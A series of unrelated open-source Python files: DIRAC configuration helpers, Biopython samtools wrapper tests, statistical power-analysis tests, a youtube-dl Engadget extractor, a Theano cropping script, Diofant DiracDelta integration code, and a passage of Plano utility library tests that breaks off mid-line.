optionsDict = result['Value'] for option, value in optionsDict.items(): cfgDefaults[name].setOption(option, value) return cfgDefaults def __getExtraOptions(currentSectionPath): from DIRAC import gConfig optionsDict = {} if not currentSectionPath: return optionsDict result = gConfig.getOptionsDict(currentSectionPath) if not result['OK']: return optionsDict print(result) return result['Value']
yujikato/DIRAC
src/DIRAC/ConfigurationSystem/Client/Helpers/ResourcesDefaults.py
Python
gpl-3.0
3,129
[ "DIRAC" ]
98b38ce9dcfc2daecaf9c14416e351406261a66aca8665c61da4405bbc67200a
# Copyright 2014 by Saket Choudhary. Based on test_Clustalw_tool.py by Peter # Cock . # # This code is part of the Biopython distribution and governed by its # license. Please see the LICENSE file that should have been included # as part of this package. # Last Checked with samtools [0.1.18 (r982:295)] from Bio import MissingExternalDependencyError import sys import os import unittest from Bio.Sequencing.Applications import SamtoolsViewCommandline from Bio.Sequencing.Applications import SamtoolsCalmdCommandline from Bio.Sequencing.Applications import SamtoolsCatCommandline from Bio.Sequencing.Applications import SamtoolsFaidxCommandline from Bio.Sequencing.Applications import SamtoolsIdxstatsCommandline from Bio.Sequencing.Applications import SamtoolsIndexCommandline from Bio.Sequencing.Applications import SamtoolsMergeCommandline from Bio.Sequencing.Applications import SamtoolsMpileupCommandline from Bio.Sequencing.Applications import SamtoolsSortCommandline # TODO from Bio.Sequencing.Applications import SamtoolsPhaseCommandline # TODO from Bio.Sequencing.Applications import SamtoolsReheaderCommandline # TODO from Bio.Sequencing.Applications import SamtoolsRmdupCommandline # TODO from Bio.Sequencing.Applications import SamtoolsTargetcutCommandline # TODO from Bio.Sequencing.Applications import SamtoolsFixmateCommandline ################################################################# # Try to avoid problems when the OS is in another language os.environ['LANG'] = 'C' samtools_exe = None if sys.platform == "win32": # TODO - Check the path? try: # This can vary depending on the Windows language. prog_files = os.environ["PROGRAMFILES"] except KeyError: prog_files = r"C:\Program Files" # By default tries C:\Program Files\samtools\samtools.exe # or C:\Program Files\samtools.exe was chosen likely_dirs = ["samtools", ""] likely_exes = ["samtools.exe"] for folder in likely_dirs: if os.path.isdir(os.path.join(prog_files, folder)): for filename in likely_exes: if os.path.isfile(os.path.join(prog_files, folder, filename)): samtools_exe = os.path.join(prog_files, folder, filename) break if samtools_exe: break else: from Bio._py3k import getoutput output = getoutput("samtools") # Since "not found" may be in another language, try and be sure this is # really the samtools tool's output if ("not found" not in output and "samtools (Tools for alignments in the SAM format)" in output): samtools_exe = "samtools" if not samtools_exe: raise MissingExternalDependencyError( """Install samtools and correctly set the file path to the program if you want to use it from Biopython""") class SamtoolsTestCase(unittest.TestCase): """Class for implementing Samtools test cases.""" def setUp(self): self.files_to_clean = set() self.samfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "sam1.sam") self.reference = os.path.join(os.path.dirname(os.path.abspath(__file__)), "BWA", "human_g1k_v37_truncated.fasta") self.referenceindexfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), "BWA", "human_g1k_v37_truncated.fasta.fai") self.samfile2 = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "sam2.sam") self.bamfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "bam1.bam") self.bamfile2 = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "bam2.bam") self.outsamfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "out.sam") self.outbamfile = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "out.bam") self.bamindexfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)), "SamBam", "bam1.bam.bai") self.files_to_clean = [self.referenceindexfile, self.bamindexfile1, self.outbamfile] def tearDown(self): for filename in self.files_to_clean: if os.path.isfile(filename): os.remove(filename) def test_view(self): """Test for samtools view""" cmdline = SamtoolsViewCommandline(samtools_exe) cmdline.set_parameter("input_file", self.bamfile1) stdout_bam, stderr_bam = cmdline() self.assertTrue(stderr_bam.startswith(""), "SAM file viewing failed: \n%s\nStdout:%s" % (cmdline, stdout_bam)) cmdline.set_parameter("input_file", self.samfile1) cmdline.set_parameter("S", True) stdout_sam, stderr_sam = cmdline() self.assertTrue( stderr_sam.startswith("[samopen] SAM header is present:"), "SAM file viewing failed:\n%s\nStderr:%s" % (cmdline, stderr_sam)) def create_fasta_index(self): """Creates index for reference fasta sequence.""" cmdline = SamtoolsFaidxCommandline(samtools_exe) cmdline.set_parameter("reference", self.reference) stdout, stderr = cmdline() def create_bam_index(self, input_bam): """Creates index of an input bam file""" cmdline = SamtoolsIndexCommandline(samtools_exe) cmdline.set_parameter("input_bam", input_bam) stdout, stderr = cmdline() def test_faidx(self): cmdline = SamtoolsFaidxCommandline(samtools_exe) cmdline.set_parameter("reference", self.reference) stdout, stderr = cmdline() self.assertFalse(stderr, "Samtools faidx failed:\n%s\nStderr:%s" % (cmdline, stderr)) self.assertTrue(os.path.isfile(self.referenceindexfile)) def test_calmd(self): """Test for samtools calmd""" self.create_fasta_index() cmdline = SamtoolsCalmdCommandline(samtools_exe) cmdline.set_parameter("reference", self.reference) cmdline.set_parameter("input_bam", self.bamfile1) # If there is no index file for the reference # samtools calmd creates one at the time of calling if os.path.exists(self.referenceindexfile): # print("exists") stderr_calmd_expected = "" else: # print("doesnt exist") stderr_calmd_expected = "[fai_load] build FASTA index.\n" stdout, stderr = cmdline() self.assertEqual(stderr, stderr_calmd_expected) def test_cat(self): cmdline = SamtoolsCatCommandline(samtools_exe) cmdline.set_parameter("o", self.outbamfile) cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2]) stdout, stderr = cmdline() self.assertEqual(stderr, "") # TODO: def test_fixmate(self): def test_sort(self): cmdline = SamtoolsSortCommandline(samtools_exe) cmdline.set_parameter("input_bam", self.bamfile1) cmdline.set_parameter("out_prefix", "SamBam/out") stdout, stderr = cmdline() self.assertFalse(stderr, "Samtools sort failed:\n%s\nStderr:%s" % (cmdline, stderr)) def test_index(self): cmdline = SamtoolsIndexCommandline(samtools_exe) cmdline.set_parameter("input_bam", self.bamfile1) stdout, stderr = cmdline() self.assertFalse(stderr, "Samtools index failed:\n%s\nStderr:%s" % (cmdline, stderr)) self.assertTrue(os.path.exists(self.bamindexfile1)) def test_idxstats(self): self.create_bam_index(self.bamfile1) cmdline = SamtoolsIdxstatsCommandline(samtools_exe) cmdline.set_parameter("input_bam", self.bamfile1) stdout, stderr = cmdline() self.assertFalse(stderr, "Samtools idxstats failed:\n%s\nStderr:%s" % (cmdline, stderr)) def test_merge(self): cmdline = SamtoolsMergeCommandline(samtools_exe) cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2]) cmdline.set_parameter("out_bam", self.outbamfile) cmdline.set_parameter("f", True) # Overwrite out.bam if it exists stdout, stderr = cmdline() self.assertFalse(stderr, "Samtools merge failed:\n%s\nStderr:%s" % (cmdline, stderr)) self.assertTrue(os.path.exists(self.outbamfile)) def test_mpileup(self): cmdline = SamtoolsMpileupCommandline(samtools_exe) cmdline.set_parameter("input_file", [self.bamfile1]) stdout, stderr = cmdline() self.assertFalse("[bam_pileup_core]" in stdout) def test_mpileup_list(self): cmdline = SamtoolsMpileupCommandline(samtools_exe) cmdline.set_parameter("input_file", [self.bamfile1, self.bamfile2]) stdout, stderr = cmdline() self.assertFalse("[bam_pileup_core]" in stdout) # TODO: def test_phase(self): # TODO: def test_reheader(self): # TODO: def test_rmdup(self): # TODO: def test_targetcut(self): if __name__ == "__main__": runner = unittest.TextTestRunner(verbosity=2) unittest.main(testRunner=runner)
updownlife/multipleK
dependencies/biopython-1.65/Tests/test_samtools_tool.py
Python
gpl-2.0
9,966
[ "BWA", "Biopython" ]
3949e0682985a8c7d108543101be47b5fc375b595ac29574a202e9b06812d080
# ---------------------------------------------------------------------------- # Copyright (c) 2013--, scikit-bio development team. # # Distributed under the terms of the Modified BSD License. # # The full license is in the file COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from unittest import TestCase, main import numpy as np import numpy.testing as npt from scipy.stats import kruskal from machivellian.power import (subsample_power, confidence_bound, _calculate_power, _compare_distributions, _check_subsample_power_inputs, ) class PowerAnalysisTest(TestCase): def setUp(self): def f(x): """returns the p value of a kruskal wallis test""" return kruskal(*x)[1] self.f = f self.num_p = 1 # Sets the random seed np.random.seed(5) # Sets up the distributions of data for use self.s1 = np.arange(0, 10, 1) # Sets up two distributions which will never be equal by a rank-sum # test. self.samps = [np.ones((10))/10., np.ones((10))] self.pop = [np.arange(0, 10, 0.1), np.arange(0, 20, 0.2)] self.counts = np.array([5, 15, 25, 35, 45]) # Sets up a vector of alpha values self.alpha = np.power(10, np.array([-1, -1.301, -2, -3])).round(3) def test_subsample_power_defaults(self): test_p = subsample_power(self.f, self.pop, self.counts, num_iter=10, num_runs=5) self.assertEqual(test_p.shape, (5, 5)) def test_subsample_power_matches(self): test_p = subsample_power(self.f, samples=self.pop, counts=self.counts, num_iter=10, num_runs=5, draw_mode="matched") self.assertEqual(test_p.shape, (5, 5)) def test_subsample_power_multi_p(self): test_p = subsample_power(lambda x: np.array([0.5, 0.5]), samples=self.pop, counts=self.counts, num_iter=10, num_runs=5) self.assertEqual(test_p.shape, (5, 5, 2)) def test_subsample_power_kwargs(self): def test(x, b=True): if b: return self.f(x) else: return np.array([self.f(x)] * 2) test_p_bt = subsample_power(test, samples=self.pop, counts=self.counts, num_iter=10, num_runs=5, test_kwargs={'b': True}) test_p_bf = subsample_power(test, samples=self.pop, counts=self.counts, num_iter=10, num_runs=5, test_kwargs={'b': False}) self.assertEqual(test_p_bt.shape, (5, 5)) self.assertEqual(test_p_bf.shape, (5, 5, 2)) def test_confidence_bound_default(self): # Sets the know confidence bound known = 2.2830070 test = confidence_bound(self.s1) npt.assert_almost_equal(test, known, 3) def test_confidence_bound_df(self): known = 2.15109 test = confidence_bound(self.s1, df=15) npt.assert_almost_equal(known, test, 3) def test_confidence_bound_alpha(self): known = 3.2797886 test = confidence_bound(self.s1, alpha=0.01) npt.assert_almost_equal(known, test, 3) def test_confidence_bound_nan(self): # Sets the value to test samples = np.array([[4, 3.2, 3.05], [2, 2.8, 2.95], [5, 2.9, 3.07], [1, 3.1, 2.93], [3, np.nan, 3.00]]) # Sets the know value known = np.array([2.2284, 0.2573, 0.08573]) # Tests the function test = confidence_bound(samples, axis=0) npt.assert_almost_equal(known, test, 3) def test_confidence_bound_axis_none(self): # Sets the value to test samples = np.array([[4, 3.2, 3.05], [2, 2.8, 2.95], [5, 2.9, 3.07], [1, 3.1, 2.93], [3, np.nan, 3.00]]) # Sest the known value known = 0.52852 # Tests the output test = confidence_bound(samples, axis=None) npt.assert_almost_equal(known, test, 3) def test_calculate_power_numeric(self): # Sets up the values to test crit = 0.025 # Sets the known value known = 0.5 # Calculates the test value test = _calculate_power(p_values=self.alpha, alpha=crit, numeric=True) # Checks the test value npt.assert_almost_equal(known, test) def test_calculate_power_reject(self): crit = 0.025 reject = self.alpha < crit known = 0.5 test = _calculate_power(p_values=reject, alpha=crit, numeric=False) npt.assert_almost_equal(known, test) def test_calculate_power_n(self): crit = 0.025 known = np.array([0.5, 0.5]) alpha = np.vstack((self.alpha, self.alpha)) test = _calculate_power(alpha, crit) npt.assert_almost_equal(known, test) def test_compare_distributions_all_mode(self): known = np.ones((100))*0.0026998 test = _compare_distributions(self.f, self.samps, 1, num_iter=100) npt.assert_allclose(known, test, 5) def test_compare_distributions_matched_mode(self): # Sets the known value known_mean = 0.162195 known_std = 0.121887 known_shape = (100,) # Tests the sample value test = _compare_distributions(self.f, self.pop, self.num_p, mode='matched', num_iter=100, bootstrap=False) npt.assert_allclose(known_mean, test.mean(), rtol=0.1, atol=0.02) npt.assert_allclose(known_std, test.std(), rtol=0.1, atol=0.02) self.assertEqual(known_shape, test.shape) def test_compare_distributions_multiple_returns(self): known = np.array([[1, 1, 1], [2, 2, 2], [3, 3, 3]]) def f(x): return np.array([1, 2, 3]) test = _compare_distributions(f, self.pop, 3, mode='matched', num_iter=3, bootstrap=False) npt.assert_array_equal(known, test) def test_compare_distributions_bootstrap_more(self): known = np.array([-76.10736642, -82.08492357, -74.45798197, -72.0498448, -82.54530595]) test = _compare_distributions(self.f, self.pop, self.num_p, counts=1000, num_iter=5) npt.assert_almost_equal(known, np.log10(test), 5) def test_check_subsample_power_inputs_draw_mode_error(self): with self.assertRaises(ValueError): _check_subsample_power_inputs(test=self.f, samples=[np.ones((2)), np.ones((5))], counts=self.counts, draw_mode="Alice Price Healy") def test_check_subsample_power_inputs_matched_mode(self): with self.assertRaises(ValueError): _check_subsample_power_inputs(test=self.f, samples=[np.ones((2)), np.ones((5))], counts=self.counts, draw_mode="matched") def test_check_subsample_power_inputs_low_counts(self): with self.assertRaises(ValueError): _check_subsample_power_inputs(test=self.f, samples=self.samps, counts=np.arange(-5, 0) ) def test_check_subsample_power_inputs_bootstrap_counts(self): with self.assertRaises(ValueError): _check_subsample_power_inputs(test=self.f, samples=[np.ones((3)), np.ones((5))], counts=self.counts, bootstrap=False) def test_check_subsample_power_inputs_ratio(self): with self.assertRaises(ValueError): _check_subsample_power_inputs(test=self.f, samples=self.samps, counts=self.counts, ratio=np.array([1, 2, 3])) def test_check_subsample_power_inputs_test(self): # Defines a test function def test(x): return 'Hello World!' with self.assertRaises(TypeError): _check_subsample_power_inputs(test=test, samples=self.samps, counts=self.counts) def test_check_subsample_power_inputs_bootstrap_error(self): with self.assertRaises(ValueError): _check_subsample_power_inputs(test=self.f, samples=self.samps, counts=np.arange(10, 1000, 10), bootstrap=False) def test_check_sample_power_inputs(self): # Defines the know returns known_num_p = 1 known_ratio = np.ones((2)) # Runs the code for the returns test_ratio, test_num_p = \ _check_subsample_power_inputs(test=self.f, samples=self.samps, counts=self.counts, ) # Checks the returns are sane self.assertEqual(known_num_p, test_num_p) npt.assert_array_equal(known_ratio, test_ratio) if __name__ == '__main__': main()
jwdebelius/Machiavellian
machivellian/tests/test_power.py
Python
bsd-3-clause
10,523
[ "scikit-bio" ]
f7fc9e151e58fe9f7249a7eaab8fc79bdfd9e11ea9f6c30e8664688eb1515511
from __future__ import unicode_literals from .common import InfoExtractor class EngadgetIE(InfoExtractor): _VALID_URL = r'https?://(?:www\.)?engadget\.com/video/(?P<id>[^/?#]+)' _TESTS = [{ # video with 5min ID 'url': 'http://www.engadget.com/video/518153925/', 'md5': 'c6820d4828a5064447a4d9fc73f312c9', 'info_dict': { 'id': '518153925', 'ext': 'mp4', 'title': 'Samsung Galaxy Tab Pro 8.4 Review', }, 'add_ie': ['FiveMin'], }, { # video with vidible ID 'url': 'https://www.engadget.com/video/57a28462134aa15a39f0421a/', 'only_matching': True, }] def _real_extract(self, url): video_id = self._match_id(url) return self.url_result('aol-video:%s' % video_id)
remitamine/youtube-dl
youtube_dl/extractor/engadget.py
Python
unlicense
807
[ "Galaxy" ]
179764d4fd38a4d27502ec70cde35dd4dfcf9b480ddfa9f89f0a4d8993963195
import theano import theano.tensor as T from crop import LocallySoftRectangularCropper from crop import Gaussian import numpy as np from datasets import get_cooking_streams from datasets import get_bmnist_streams import matplotlib # Force matplotlib to not use any Xwindows backend. matplotlib.use('Agg') import matplotlib.pyplot as plt def draw(img): if img.shape[0] == 1: plt.imshow(img[0], cmap=plt.get_cmap('gray'), interpolation='nearest') else: plt.imshow(np.swapaxes(img[:, :, :, np.newaxis], 0, 3)[0], interpolation='nearest') location = T.fmatrix() scale = T.fmatrix() alpha = T.fmatrix() x = T.fvector() batch_size = 1 num_channel = 1 patch_shape = (28, 28) image_shape = (100, 100) hyperparameters = {} hyperparameters["cutoff"] = 3000 hyperparameters["batched_window"] = True # tds, _ = get_cooking_streams(batch_size) tds, _ = get_bmnist_streams(1) res = tds.get_epoch_iterator(as_dict=True).next()['features'] # shape: 3 x 125 x 200 img = res[5, 0] draw(img) plt.savefig('img.png') cropper = LocallySoftRectangularCropper( patch_shape=patch_shape, hyperparameters=hyperparameters, kernel=Gaussian()) patch1, matrix, dx2 = cropper.apply( x.reshape((batch_size, num_channel,) + image_shape), np.array([list(image_shape)]), location, scale, alpha) grads = T.grad(T.mean(patch1), x) grad_scale = abs(T.grad(T.mean(patch1), scale)) grad_location = abs(T.grad(T.mean(patch1), location)) grad_alpha = abs(T.grad(T.mean(patch1), alpha)) f = theano.function( [x, location, scale, alpha], [patch1, grads, grad_scale + grad_location + grad_alpha, matrix, dx2], allow_input_downcast=True) image = img.flatten().astype('float32') locations = [[50, 50], [100, 70], [10, 190]] scales = [[0.28, 0.28], [0.6, 0.6], [1, 1]] alphas = [[0.001, 0.001], [0.5, 0.5], [0.9, 0.9]] res = f(image, [[50, 50]], [[0.4, 0.4]], [[0.001, 0.001]]) import ipdb; ipdb.set_trace() for i in np.arange(1): for j in np.arange(1): for k in np.arange(3): location_ = [locations[i]] scale_ = [scales[j]] alpha_ = [alphas[k]] plt.figure() plt.subplot(131) p = f(image, location_, scale_, alpha_)[0][0] # import ipdb; ipdb.set_trace() draw(p) plt.subplot(132) if num_channel == 3: g = np.abs(f(image, location_, scale_, alpha_)[1].reshape( 3, image_shape[0], image_shape[1])) g = np.sum(g, axis=0) else: g = np.abs(f(image, location_, scale_, alpha_)[1].reshape( image_shape[0], image_shape[1])) g = (g - g.mean()) / g.std() plt.imshow(g[1:-1, 1:-1], cmap=plt.get_cmap('gray'), interpolation='nearest') plt.subplot(133) m = np.abs(f(image, location_, scale_, alpha_)[3][0]) res = f(image, location_, scale_, alpha_)[4] plt.imshow(m, interpolation='nearest', vmin=0, vmax=1) plt.tight_layout() plt.savefig('sample' + str(i) + str(j) + str(k) + '.png', dpi=450) print np.abs(f(image, location_, scale_, alpha_)[2])
negar-rostamzadeh/rna
test_crop.py
Python
mit
3,244
[ "Gaussian" ]
332dc11a6480f2110477ebca7ac47d287cf5aee32448fb86e7df16b141ab5192
from ..core import Mul from ..core.compatibility import default_sort_key from ..functions import DiracDelta, Heaviside def change_mul(node, x): """change_mul(node, x) Rearranges the operands of a product, bringing to front any simple DiracDelta expression. If no simple DiracDelta expression was found, then all the DiracDelta expressions are simplified (using DiracDelta.simplify). Return: (dirac, new node) Where: o dirac is either a simple DiracDelta expression or None (if no simple expression was found); o new node is either a simplified DiracDelta expressions or None (if it could not be simplified). Examples ======== >>> change_mul(x*y*DiracDelta(x)*cos(x), x) (DiracDelta(x), x*y*cos(x)) >>> change_mul(x*y*DiracDelta(x**2 - 1)*cos(x), x) (None, x*y*cos(x)*DiracDelta(x - 1)/2 + x*y*cos(x)*DiracDelta(x + 1)/2) >>> change_mul(x*y*DiracDelta(cos(x))*cos(x), x) (None, None) See Also ======== diofant.functions.special.delta_functions.DiracDelta deltaintegrate """ if not (node.is_Mul or node.is_Pow): return node new_args = [] dirac = None # Sorting is needed so that we consistently collapse the same delta; # However, we must preserve the ordering of non-commutative terms c, nc = node.args_cnc() sorted_args = sorted(c, key=default_sort_key) sorted_args.extend(nc) for arg in sorted_args: if arg.is_Pow and isinstance(arg.base, DiracDelta): new_args.append(arg.func(arg.base, arg.exp - 1)) arg = arg.base if dirac is None and (isinstance(arg, DiracDelta) and arg.is_simple(x) and (len(arg.args) <= 1 or arg.args[1] == 0)): dirac = arg else: new_args.append(arg) if not dirac: # there was no simple dirac new_args = [] for arg in sorted_args: if isinstance(arg, DiracDelta): new_args.append(arg.simplify(x)) elif arg.is_Pow and isinstance(arg.base, DiracDelta): new_args.append(arg.func(arg.base.simplify(x), arg.exp)) else: new_args.append(change_mul(arg, x)) if new_args != sorted_args: nnode = Mul(*new_args).expand() else: # if the node didn't change there is nothing to do nnode = None return None, nnode return dirac, Mul(*new_args) def deltaintegrate(f, x): """ deltaintegrate(f, x) The idea for integration is the following: - If we are dealing with a DiracDelta expression, i.e. DiracDelta(g(x)), we try to simplify it. If we could simplify it, then we integrate the resulting expression. We already know we can integrate a simplified expression, because only simple DiracDelta expressions are involved. If we couldn't simplify it, there are two cases: 1) The expression is a simple expression: we return the integral, taking care if we are dealing with a Derivative or with a proper DiracDelta. 2) The expression is not simple (i.e. DiracDelta(cos(x))): we can do nothing at all. - If the node is a multiplication node having a DiracDelta term: First we expand it. If the expansion did work, then we try to integrate the expansion. If not, we try to extract a simple DiracDelta term, then we have two cases: 1) We have a simple DiracDelta term, so we return the integral. 2) We didn't have a simple term, but we do have an expression with simplified DiracDelta terms, so we integrate this expression. Examples ======== >>> deltaintegrate(x*sin(x)*cos(x)*DiracDelta(x - 1), x) sin(1)*cos(1)*Heaviside(x - 1) >>> deltaintegrate(y**2*DiracDelta(x - z)*DiracDelta(y - z), y) z**2*DiracDelta(x - z)*Heaviside(y - z) See Also ======== diofant.functions.special.delta_functions.DiracDelta diofant.integrals.integrals.Integral """ if not f.has(DiracDelta): return from .integrals import Integral, integrate from ..solvers import solve # g(x) = DiracDelta(h(x)) if f.func == DiracDelta: h = f.simplify(x) if h == f: # can't simplify the expression # FIXME: the second term tells whether is DeltaDirac or Derivative # For integrating derivatives of DiracDelta we need the chain rule if f.is_simple(x): if (len(f.args) <= 1 or f.args[1] == 0): return Heaviside(f.args[0]) else: return (DiracDelta(f.args[0], f.args[1] - 1) / f.args[0].as_poly().LC()) else: # let's try to integrate the simplified expression fh = integrate(h, x) return fh elif f.is_Mul or f.is_Pow: # g(x) = a*b*c*f(DiracDelta(h(x)))*d*e g = f.expand() if f != g: # the expansion worked fh = integrate(g, x) if fh is not None and not isinstance(fh, Integral): return fh else: # no expansion performed, try to extract a simple DiracDelta term dg, rest_mult = change_mul(f, x) if not dg: if rest_mult: fh = integrate(rest_mult, x) return fh else: dg = dg.simplify(x) if dg.is_Mul: # Take out any extracted factors dg, rest_mult_2 = change_mul(dg, x) rest_mult = rest_mult*rest_mult_2 point = solve(dg.args[0], x)[0][x] return (rest_mult.subs({x: point})*Heaviside(x - point))
skirpichev/omg
diofant/integrals/deltafunctions.py
Python
bsd-3-clause
5,793
[ "DIRAC" ]
5abd52c7cdece50c7f2a29f50a05dd792ec6bd639a63da6a64d19c4b3fb50fa3
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # import os as _os import pwd as _pwd import signal as _signal import socket as _socket import sys as _sys import threading as _threading try: import http.server as _http except ImportError: # pragma: nocover import BaseHTTPServer as _http from plano import * test_project_dir = join(get_parent_dir(get_parent_dir(__file__)), "test-project") class test_project(working_dir): def __enter__(self): dir = super(test_project, self).__enter__() copy(test_project_dir, ".", inside=False) return dir TINY_INTERVAL = 0.05 @test def archive_operations(): with working_dir(): make_dir("some-dir") touch("some-dir/some-file") make_archive("some-dir") assert is_file("some-dir.tar.gz") extract_archive("some-dir.tar.gz", output_dir="some-subdir") assert is_dir("some-subdir/some-dir") assert is_file("some-subdir/some-dir/some-file") rename_archive("some-dir.tar.gz", "something-else") assert is_file("something-else.tar.gz") extract_archive("something-else.tar.gz") assert is_dir("something-else") assert is_file("something-else/some-file") @test def command_operations(): class SomeCommand(BaseCommand): def __init__(self): self.parser = BaseArgumentParser() self.parser.add_argument("--interrupt", action="store_true") self.parser.add_argument("--explode", action="store_true") def parse_args(self, args): return self.parser.parse_args(args) def init(self, args): self.verbose = args.verbose self.interrupt = args.interrupt self.explode = args.explode def run(self): if self.verbose: print("Hello") if self.interrupt: raise KeyboardInterrupt() if self.explode: raise PlanoError("Exploded") SomeCommand().main([]) SomeCommand().main(["--interrupt"]) with expect_system_exit(): SomeCommand().main(["--verbose", "--explode"]) @test def console_operations(): eprint("Here's a story") eprint("About a", "man named Brady") pprint(list_dir()) pprint(PlanoProcess, 1, "abc", end="\n\n") flush() with console_color("red"): print("ALERT") print(cformat("AMBER ALERT", color="yellow")) print(cformat("NO ALERT")) cprint("CRITICAL ALERT", color="red", bright=True) @test def dir_operations(): with working_dir(): test_dir = make_dir("some-dir") test_file_1 = touch(join(test_dir, "some-file-1")) test_file_2 = touch(join(test_dir, "some-file-2")) result = list_dir(test_dir) assert join(test_dir, result[0]) == test_file_1, (join(test_dir, result[0]), test_file_1) result = list_dir(test_dir, "*-file-1") assert result == ["some-file-1"], (result, ["some-file-1"]) result = list_dir(test_dir, exclude="*-file-1") assert result == ["some-file-2"], (result, ["some-file-2"]) result = list_dir("some-dir", "*.not-there") assert result == [], result with working_dir(): result = list_dir() assert result == [], result result = find(test_dir) assert result == [test_file_1, test_file_2], (result, [test_file_1, test_file_2]) result = find(test_dir, "*-file-1") assert result == [test_file_1], (result, [test_file_1]) result = find(test_dir, exclude="*-file-1") assert result == [test_file_2], (result, [test_file_2]) with working_dir(): result = find() assert result == [], result with working_dir(): with working_dir("a-dir", quiet=True): touch("a-file") curr_dir = get_current_dir() prev_dir = change_dir("a-dir") new_curr_dir = get_current_dir() new_prev_dir = change_dir(curr_dir) assert curr_dir == prev_dir, (curr_dir, prev_dir) assert new_curr_dir == new_prev_dir, (new_curr_dir, new_prev_dir) @test def env_operations(): result = join_path_var("a", "b", "c", "a") assert result == "a:b:c", result curr_dir = get_current_dir() with working_dir("."): assert get_current_dir() == curr_dir, (get_current_dir(), curr_dir) result = get_home_dir() assert result == ENV["HOME"], result result = get_home_dir("alice") assert result.endswith("alice"), result user = _pwd.getpwuid(_os.getuid())[0] result = get_user() assert result == user, (result, user) result = get_hostname() assert result, result result = get_program_name() assert result, result result = get_program_name("alpha beta") assert result == "alpha", result result = get_program_name("X=Y alpha beta") assert result == "alpha", result result = which("echo") assert result, result with working_env(YES_I_AM_SET=1): check_env("YES_I_AM_SET") with expect_error(): check_env("NO_I_AM_NOT") with working_env(I_AM_SET_NOW=1, amend=False): check_env("I_AM_SET_NOW") assert "YES_I_AM_SET" not in ENV, ENV with working_env(SOME_VAR=1): assert ENV["SOME_VAR"] == "1", ENV.get("SOME_VAR") with working_env(SOME_VAR=2): assert ENV["SOME_VAR"] == "2", ENV.get("SOME_VAR") with expect_error(): check_program("not-there") with expect_error(): check_module("not_there") with expect_output(contains="ARGS:") as out: with open(out, "w") as f: print_env(file=f) @test def file_operations(): with working_dir(): alpha_dir = make_dir("alpha-dir") alpha_file = touch(join(alpha_dir, "alpha-file")) alpha_link = make_link(join(alpha_dir, "alpha-file-link"), "alpha-file") alpha_broken_link = make_link(join(alpha_dir, "broken-link"), "no-such-file") beta_dir = make_dir("beta-dir") beta_file = touch(join(beta_dir, "beta-file")) beta_link = make_link(join(beta_dir, "beta-file-link"), "beta-file") beta_broken_link = make_link(join(beta_dir, "broken-link"), join("..", alpha_dir, "no-such-file")) beta_another_link = make_link(join(beta_dir, "broken-link"), join("..", alpha_dir, "alpha-file-link")) assert exists(beta_link) assert exists(beta_file) with working_dir("beta-dir"): assert is_file(read_link("beta-file-link")) copied_file = copy(alpha_file, beta_dir) assert copied_file == join(beta_dir, "alpha-file"), copied_file assert is_file(copied_file), list_dir(beta_dir) copied_link = copy(beta_link, join(beta_dir, "beta-file-link-copy")) assert copied_link == join(beta_dir, "beta-file-link-copy"), copied_link assert is_link(copied_link), list_dir(beta_dir) copied_dir = copy(alpha_dir, beta_dir) assert copied_dir == join(beta_dir, "alpha-dir"), copied_dir assert is_link(join(copied_dir, "alpha-file-link")) moved_file = move(beta_file, alpha_dir) assert moved_file == join(alpha_dir, "beta-file"), moved_file assert is_file(moved_file), list_dir(alpha_dir) assert not exists(beta_file), list_dir(beta_dir) moved_dir = move(beta_dir, alpha_dir) assert moved_dir == join(alpha_dir, "beta-dir"), moved_dir assert is_dir(moved_dir), list_dir(alpha_dir) assert not exists(beta_dir) gamma_dir = make_dir("gamma-dir") gamma_file = touch(join(gamma_dir, "gamma-file")) delta_dir = make_dir("delta-dir") delta_file = touch(join(delta_dir, "delta-file")) copy(gamma_dir, delta_dir, inside=False) assert is_file(join("delta-dir", "gamma-file")) move(gamma_dir, delta_dir, inside=False) assert is_file(join("delta-dir", "gamma-file")) assert not exists(gamma_dir) epsilon_dir = make_dir("epsilon-dir") epsilon_file_1 = touch(join(epsilon_dir, "epsilon-file-1")) epsilon_file_2 = touch(join(epsilon_dir, "epsilon-file-2")) epsilon_file_3 = touch(join(epsilon_dir, "epsilon-file-3")) epsilon_file_4 = touch(join(epsilon_dir, "epsilon-file-4")) remove("not-there") remove(epsilon_file_2) assert not exists(epsilon_file_2) remove(epsilon_dir) assert not exists(epsilon_file_1) assert not exists(epsilon_dir) remove([epsilon_file_3, epsilon_file_4]) assert not exists(epsilon_file_3) assert not exists(epsilon_file_4) file = write("xes", "x" * 10) result = get_file_size(file) assert result == 10, result @test def http_operations(): class Handler(_http.BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.end_headers() self.wfile.write(b"[1]") def do_POST(self): length = int(self.headers["content-length"]) content = self.rfile.read(length) self.send_response(200) self.end_headers() self.wfile.write(content) def do_PUT(self): length = int(self.headers["content-length"]) content = self.rfile.read(length) self.send_response(200) self.end_headers() class ServerThread(_threading.Thread): def __init__(self, server): _threading.Thread.__init__(self) self.server = server def run(self): self.server.serve_forever() host, port = "localhost", get_random_port() url = "http://{0}:{1}".format(host, port) server = _http.HTTPServer((host, port), Handler) server_thread = ServerThread(server) server_thread.start() try: with working_dir(): result = http_get(url) assert result == "[1]", result result = http_get(url, insecure=True) assert result == "[1]", result result = http_get(url, output_file="a") output = read("a") assert result is None, result assert output == "[1]", output result = http_get_json(url) assert result == [1], result file_b = write("b", "[2]") result = http_post(url, read(file_b), insecure=True) assert result 